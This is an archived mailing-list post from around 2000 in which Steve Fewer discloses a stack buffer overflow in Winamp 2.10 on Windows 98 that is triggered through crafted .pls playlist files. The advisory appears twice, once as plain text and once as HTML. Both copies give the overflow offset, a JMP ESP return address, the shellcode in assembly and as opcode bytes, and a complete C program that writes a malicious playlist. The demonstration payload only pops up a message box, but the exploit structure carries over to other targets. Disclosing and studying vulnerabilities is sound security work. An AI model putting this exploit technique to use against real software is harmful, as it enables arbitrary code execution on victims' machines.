This message is in MIME format --_=XFMail.1.4.0.Linux:000109112131:762=_ Content-Type: text/plain; charset=us-ascii Hi! There's a stack based buffer overflow in WinAmp 2.10 (Win 98) which allows an user to execute arbitrary code. Here's the source code and some better intro! Be careful, Transfer Interrupted -- "This vulnerability is completely theoretical!" -Microsoft --_=XFMail.1.4.0.Linux:000109112131:762=_ Content-Disposition: attachment; filename="winamp.win98.txt" Content-Transfer-Encoding: 7bit Content-Description: winamp.win98.txt Content-Type: text/plain; charset=us-ascii; name=winamp.win98.txt; SizeOnDisk=13229 Author: Steve Fewer, darkplanat_private http://indigo.ie/~lmf Introduction: I recently uncovered a stack based buffer overflow in winamp version 2.10 which lets me execute 'arbitrary code'. It is=20 carried out through .pls files which winamp uses for playlists.=20 This is unnerving as it is a feasible plan to trade playlists on irc during a mp3 trading session with someone. The overflow occurs when an entry greater than 580 bytes is=20 read in from a .pls file. The EIP is the only register overwritten=20 in the next four bytes that follow, from there on is space for=20 your shell code. eg. [playlist] File1=3D<580 bytes><eip><shell code> NumberOfEntries=3D1 =20 The first 580 bytes get mangled around in memory but the 585=20 byte (where our shell code starts) is pointed to by the ESP,=20 therefore a simple 'JMP ESP' or the like will land us back in=20 our shell code. I used a 'JMP ESP' at address 0xBFB9CFF7 in=20 comctl32.dll which winamp loads. Pointing our EIP into that=20 address lands us back where we want to be.=20 This was all created/tested on Windows 98 [Version 4.10.1998] running on an Intel PII400 with 128MB RAM. The Shell Code: The shell code I wrote for this simply displays a message box=20 and then calls exit(). However Winamp doesn't load msvcrt.dll=20 which is needed to call exit() so we have to load it ourselves.=20 I used the address 0xBFF776D4 in kernel32.dll (v4.10.1998) for LoadLibraryA(). For calling Messagebox I used the address=20 0xBFF5412E in user32.dll (v4.10.1998) and for calling exit() I=20 used the address 0x78005504 in msvcrt.dll (v6.00.8397.0). It=20 didn't warrant using GetProcAddress for compatibilities sake. For the OP codes see the exploit further on. // This loads msvcrt.dll push ebp mov ebp,esp xor eax,eax push eax push eax push eax mov byte ptr[ebp-0Ch],4Dh mov byte ptr[ebp-0Bh],53h mov byte ptr[ebp-0Ah],56h mov byte ptr[ebp-09h],43h mov byte ptr[ebp-08h],52h mov byte ptr[ebp-07h],54h mov byte ptr[ebp-06h],2Eh mov byte ptr[ebp-05h],44h mov byte ptr[ebp-04h],4Ch mov byte ptr[ebp-03h],4Ch mov edx,0xBFF776D4 push edx lea eax,[ebp-0Ch] push eax call dword ptr[ebp-10h] // This calls MessageBox to say 'Hi!' push ebp mov ebp,esp xor edi,edi push edi mov byte ptr[ebp-04h],48h mov byte ptr[ebp-03h],69h mov byte ptr[ebp-02h],21h mov edx, 0xBFF5412E push edx push edi lea edx,[ebp-04h] push edx push edx push edi call dword ptr[ebp-08h] // This calls exit() push ebp mov ebp,esp mov edx,0xFFFFFFFF sub edx,0x87FFAAFB push edx xor eax,eax push eax call dword ptr[ebp-04h] The Exploit: <-snip-> /* Stack based buffer overflow exploit for Winamp v2.10 * Author Steve Fewer, 04-01-2k. Mail me at darkplanat_private * * For a detailed description on the exploit see my advisory. * * Tested with Winamp v2.10 using Windows98 on an Intel * PII 400 with 128MB RAM * * http://indigo.ie/~lmf */ #include <stdio.h> int main() { printf("\n\n\t\t.......................................\n"); printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n"); printf("\t\t.......................................\n"); printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n"); printf("\t\t.........http://indigo.ie/~lmf.........\n"); printf("\t\t.......................................\n\n"); char buffer[640]; char eip[8] =3D "\xF7\xCF\xB9\xBF"; char sploit[256] =3D = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53 \xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\= xFA\x2E\xC6 \x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\xbF\x52\x8D\= x45\xF4\x50 \xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\= x45\xFE\x21 \xBA\x2E\x41\xF5\xBF\x52\x57\x8D\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\= xEC\xBA\xFF \xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC"; FILE *file; for(int x=3D0;x<580;x++) { buffer[x] =3D 0x90; } file =3D fopen("crAsh.pls","wb"); fprintf(file, "[playlist]\n"); fprintf(file, "File1=3D"); fprintf(file, "%s", buffer); fprintf(file, "%s", eip); fprintf(file, "%s", sploit); fprintf(file, "\nNumberOfEntries=3D1"); fclose(file); printf("\t created file crAsh.pls loaded with the exploit.\n"); return 0; } <-snip-> -=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-= =3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D ------=_NextPart_000_0029_01BF56CF.4A7BA760 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META content=3D"text/html; charset=3Diso-8859-1" = http-equiv=3DContent-Type> <META content=3D"MSHTML 5.00.2722.2800" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT face=3DArial size=3D2>Nullsoft Winamp 2.10 buffer overflow=20 advisory<BR>-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-= =3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D<BR>Author:=20 Steve Fewer, <A=20 href=3D"mailto:darkplanat_private">darkplanat_private</A><BR>&nbs= p;  = ; =20 <A=20 href=3D"http://indigo.ie/~lmf">http://indigo.ie/~lmf><BR>-=3D-=3D-=3D-= =3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D= -=3D-=3D-=3D-=3D-=3D-=3D</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Introduction:</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>I recently uncovered a stack based = buffer overflow=20 in winamp<BR>version 2.10 which lets me execute 'arbitrary code'. It is=20 <BR>carried out through .pls files which winamp uses for playlists. = <BR>This is=20 unnerving as it is a feasible plan to trade playlists on<BR>irc during a = mp3=20 trading session with someone.</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>The overflow occurs when an entry = greater than 580=20 bytes is <BR>read in from a .pls file. The EIP is the only register = overwritten=20 <BR>in the next four bytes that follow, from there on is space for = <BR>your=20 shell code. eg.</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>[playlist]<BR>File1=3D<580=20 bytes><eip><shell code><BR>NumberOfEntries=3D1 = </FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>The first 580 bytes get mangled around = in memory=20 but the 585 <BR>byte (where our shell code starts) is pointed to by the = ESP,=20 <BR>therefore a simple 'JMP ESP' or the like will land us back in = <BR>our shell=20 code. I used a 'JMP ESP' at address 0xBFB9CFF7 in <BR>comctl32.dll which = winamp=20 loads. Pointing our EIP into that <BR>address lands us back where we = want to be.=20 </FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>This was all created/tested on Windows = 98 [Version=20 4.10.1998]<BR>running on an Intel PII400 with 128MB RAM.</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><BR>The Shell Code:</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>The shell code I wrote for this simply = displays a=20 message box <BR>and then calls exit(). However Winamp doesn't load = msvcrt.dll=20 <BR>which is needed to call exit() so we have to load it ourselves. = <BR>I used=20 the address 0xBFF776D4 in kernel32.dll (v4.10.1998) = for<BR>LoadLibraryA(). For=20 calling Messagebox I used the address <BR>0xBFF5412E in user32.dll = (v4.10.1998)=20 and for calling exit() I <BR>used the address 0x78005504 in msvcrt.dll=20 (v6.00.8397.0). It <BR>didn't warrant using GetProcAddress for = compatibilities=20 sake.<BR>For the OP codes see the exploit further on.</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2> // This loads=20 msvcrt.dll<BR> push ebp<BR> mov=20 ebp,esp<BR> xor eax,eax<BR> push=20 eax<BR> push eax<BR> push=20 eax<BR> mov byte = ptr[ebp-0Ch],4Dh<BR> mov=20 byte ptr[ebp-0Bh],53h<BR> mov byte=20 ptr[ebp-0Ah],56h<BR> mov byte=20 ptr[ebp-09h],43h<BR> mov byte=20 ptr[ebp-08h],52h<BR> mov byte=20 ptr[ebp-07h],54h<BR> mov byte=20 ptr[ebp-06h],2Eh<BR> mov byte=20 ptr[ebp-05h],44h<BR> mov byte=20 ptr[ebp-04h],4Ch<BR> mov byte=20 ptr[ebp-03h],4Ch<BR> mov = edx,0xBFF776D4<BR> =20 push edx<BR> lea eax,[ebp-0Ch]<BR> = push=20 eax<BR> call dword ptr[ebp-10h]<BR> = // This=20 calls MessageBox to say 'Hi!'<BR> push=20 ebp<BR> mov ebp,esp<BR> xor=20 edi,edi<BR> push edi<BR> mov byte=20 ptr[ebp-04h],48h<BR> mov byte=20 ptr[ebp-03h],69h<BR> mov byte=20 ptr[ebp-02h],21h<BR> mov edx, = 0xBFF5412E<BR> =20 push edx<BR> push edi<BR> lea=20 edx,[ebp-04h]<BR> push edx<BR> push=20 edx<BR> push edi<BR> call dword=20 ptr[ebp-08h]<BR> // This calls = exit()<BR> =20 push ebp<BR> mov ebp,esp<BR> mov=20 edx,0xFFFFFFFF<BR> sub = edx,0x87FFAAFB<BR> =20 push edx<BR> xor eax,eax<BR> push=20 eax<BR> call dword ptr[ebp-04h]</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>The Exploit:</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><-snip-></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>/* Stack based buffer overflow exploit = for Winamp=20 v2.10<BR> * Author Steve Fewer, 04-01-2k. Mail me at <A=20 href=3D"mailto:darkplanat_private">darkplanat_private</A><BR>&nbs= p;*<BR> *=20 For a detailed description on the exploit see my = advisory.<BR> *<BR> *=20 Tested with Winamp v2.10 using Windows98 on an Intel<BR> * PII 400 = with=20 128MB RAM<BR> *<BR> * <A=20 href=3D"http://indigo.ie/~lmf">http://indigo.ie/~lmf><BR> */</FON= T></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>#include <stdio.h></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>int main()<BR>{</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2> =20 printf("\n\n\t\t.......................................\n");<BR> &nb= sp; =20 printf("\t\t......Nullsoft Winamp 2.10 = exploit.....\n");<BR> =20 printf("\t\t.......................................\n");<BR> &= nbsp;=20 printf("\t\t.....Author: Steve Fewer, = 04-01-2k.....\n");<BR> =20 printf("\t\t.........http://indigo.ie/~lmf.........\n");<BR> &= nbsp;=20 printf("\t\t.......................................\n\n");</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>char buffer[640];<BR>char eip[8] =3D=20 "\xF7\xCF\xB9\xBF";<BR>char sploit[256] =3D=20 "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53<BR>\xC6= \x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\= x2E\xC6<BR>\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\x= bF\x52\x8D\x45\xF4\x50<BR>\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xF= C\x48\xC6\x45\xFD\x69\xC6\x45\xFE\x21<BR>\xBA\x2E\x41\xF5\xBF\x52\x57\x8D= \x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\xEC\xBA\xFF<BR>\xFF\xFF\xFF\x81\= xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>FILE *file;</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2> for(int=20 x=3D0;x<580;x++)<BR> {<BR> = buffer[x] =3D=20 0x90;<BR> }</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>file =3D = fopen("crAsh.pls","wb");</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>fprintf(file, = "[playlist]\n");<BR>fprintf(file,=20 "File1=3D");<BR>fprintf(file, "%s", buffer);<BR>fprintf(file, "%s",=20 eip);<BR>fprintf(file, "%s", sploit);<BR>fprintf(file,=20 "\nNumberOfEntries=3D1");</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial = size=3D2>fclose(file);<BR>printf("\t =20 created file crAsh.pls loaded with the exploit.\n");<BR>return=20 0;<BR>}</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2><-snip-></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial=20 size=3D2><BR>-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D= -=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D<BR></FONT></DIV></BO= DY></HTML> ------=_NextPart_000_0029_01BF56CF.4A7BA760-- --_=XFMail.1.4.0.Linux:000109112131:762=_-- End of MIME message
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:27:21 PDT